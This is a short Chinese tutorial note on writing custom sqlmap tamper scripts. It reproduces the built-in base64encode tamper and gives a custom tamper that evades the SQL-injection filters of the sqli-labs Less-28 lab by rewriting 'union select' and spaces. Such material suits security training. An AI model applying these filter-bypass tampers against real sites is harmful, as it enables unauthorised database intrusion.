0x00

$ python sqlmap.py --list-tampers #查看内置tamper

sqlmap提供了很多的内置tamper,其包含了常见数据库的sql注入绕过,可在特定条件下进行SQL注入绕过防御。

0x01

--tamper=xxx.py

使用时加上tamper选项即可。

0x02

根据具体情况编写自己的tamper脚本

  1. 依据自己当前分析或fuzz出的原理

  2. 照猫画虎,动手编写

0x03

先看一下内置tamper base64encode.py的写法,了解了内置tamper的写法,只需对此照猫画虎即可!

#!/usr/bin/env python    #这部分是头部声明,paython文件的声明"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""                      #这部分是注释说明,关于sqlmap的说明import base64           #这里是需要用到的第三方库的引入from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING#这部分是sqlmap内部调用,基本不变
__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):"""Base64-encodes all characters in a given payload>>> tamper("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='"""return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload#这部分就是重点内容,payload的代码

以sqli-labs/Less_28为编写示列:已知此场景对 /、 *、 -、 #、 space(空格)、 +、 union\s+select进行了过滤处理,对此编写脚本如下:

#!/usr/bin/env python"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING__priority__ = PRIORITY.LOWdef dependencies():passdef tamper(payload, **kwargs):"""Bypass sqli-lab/Less-28 """if payload:payload = payload.replace('union select','union all select').replace(' ','%0a')return payload

参考: web安全工程师(进阶)-网易云课堂.
原文地址:www.cluren.xyz

SQLmap Tamper编写方法(笔记)相关推荐

  1. Sqlmap Tamper编写

    Sqlmap Tamper编写 Sqlmap Tamper是sqlmap可以调用的脚本,已进行对payload的修改,如:双写.替换空格.编码等. sqlmap可以使用--tamper调用,编写使用P ...

  2. SQLMAP tamper编写(bypass 安全狗)

    其实sqlmap tamper的编写 核心只不过是在原有的tamper框架上,根据不同的WAF然后对payload进行针对性的更改 以达绕过. Priority 自带的tamper脚本中一共有以下几种 ...

  3. sqlmap tamper脚本编写

    0x00 sqlmap tamper简介 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf. 0x01 ...

  4. SQLMAP插件tamper编写与使用

    今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper编写与使用. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次 ...

  5. 通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入

    原文链接:https://yq.aliyun.com/articles/214915 本文讲的是通过Burp以及自定义的Sqlmap Tamper进行二次SQL注入, 其中一种安全漏洞被叫做二次注入, ...

  6. Windows 2003不同域之间迁移密码方法笔记截图

    Windows 2003不同域之间迁移密码方法笔记截图 ([url]http://godoha.blog.51cto.com[/url]_ by Weihu_Yan 2009-1-22) (详见附件) ...

  7. 初步解读Golang中的接口相关编写方法

    初步解读Golang中的接口相关编写方法 概述如果说goroutine和channel是Go并发的两大基石,那么接口是Go语言编程中数据类型的关键.在Go语言的实际编程中,几乎所有的数据结构都围绕接口 ...

  8. 计算机专业博士发论文,计算机专业本科、硕士、博士学位论文编写方法浅析

    虽说都是学位论文,但是本科.硕士.博士的论文差别还是很大的,所谓的差别不是指篇幅的长短,而是指编写思路与评价标准应有很大不同.近年来我发现这三类论文的评价体系出现了趋同的现象,因为三个级别的学位论文评 ...

  9. Java黑皮书课后题第7章:7.15(消除重复)使用下面的方法头编写方法,消除数组中重复出现的值。编写一个测试程序,读取10个数,调用该方法,并显示以一个空格分隔的不同数字

    7.15(消除重复)使用下面的方法头编写方法,消除数组中重复出现的值.编写一个测试程序,读取10个数,调用该方法,并显示以一个空格分隔的不同数字 题目 题目描述与运行示例 破题 代码 21.11.11 ...

最新文章

  1. 亚马逊部分 AWS DNS 系统遭 DDoS 攻击,已达数小时之久
  2. mac下安装nginx和php
  3. eclipse 中警告信息汇总
  4. [转]最常用的15大Eclipse开发快捷键技巧
  5. 在mac上用文本编辑器写python_Mac开源文本编辑器CotEditor
  6. 2017-10-08 前端日报
  7. 为什么程序员对旧代码深恶痛绝?
  8. 把代码写成艺术,真正体会面向对象编程思想
  9. 基于SSM和Vue的旅游网和旅游管理系统
  10. 2018上半年区块链安全报告
  11. java交通灯英文文献,194关于单片机智能交通灯控制系统设计有关的外文文献翻译成品:基于单片机的智能交通控制系统(中英文双语对照)7...
  12. 英特尔cpu发布时间表_2014英特尔处理器发布时间表
  13. Lab4 Architecture Lab
  14. 多时点DID实证流程笔记(Aggregate Effects from Public Works: Evidence from India)
  15. ubantu启动黑屏解决办法
  16. canvas画拓扑图(箭头连线)
  17. Export2Excel实现多级表头以及多个sheet页
  18. Quartz使用详解!
  19. 放大电路的分析方法(以共射放大电路为例、交流通路、直流通路、三极管等效电路及其如何等效的)
  20. krpano 项目自制 - 内测可用

热门文章

  1. 攻防演练实战派|专题合集之攻防演练全流程
  2. 谭铁牛院士谈人工智能发展新动态
  3. 怎么判断MES系统好不好?MES又是如何帮企业省钱的?
  4. 英特尔发布第三代全新可扩展处理器,加速5G网络转型
  5. [字符串题-java]1189. “气球” 的最大数量
  6. x264参数设置详解(x264 settings)
  7. 图像视频滤镜算法---颜色滤镜
  8. 开发脚手架及封装自动化构建工作流
  9. 3-综合案例:月福首页-多媒体-图片热点-框架
  10. 数据分析之Hadoop详解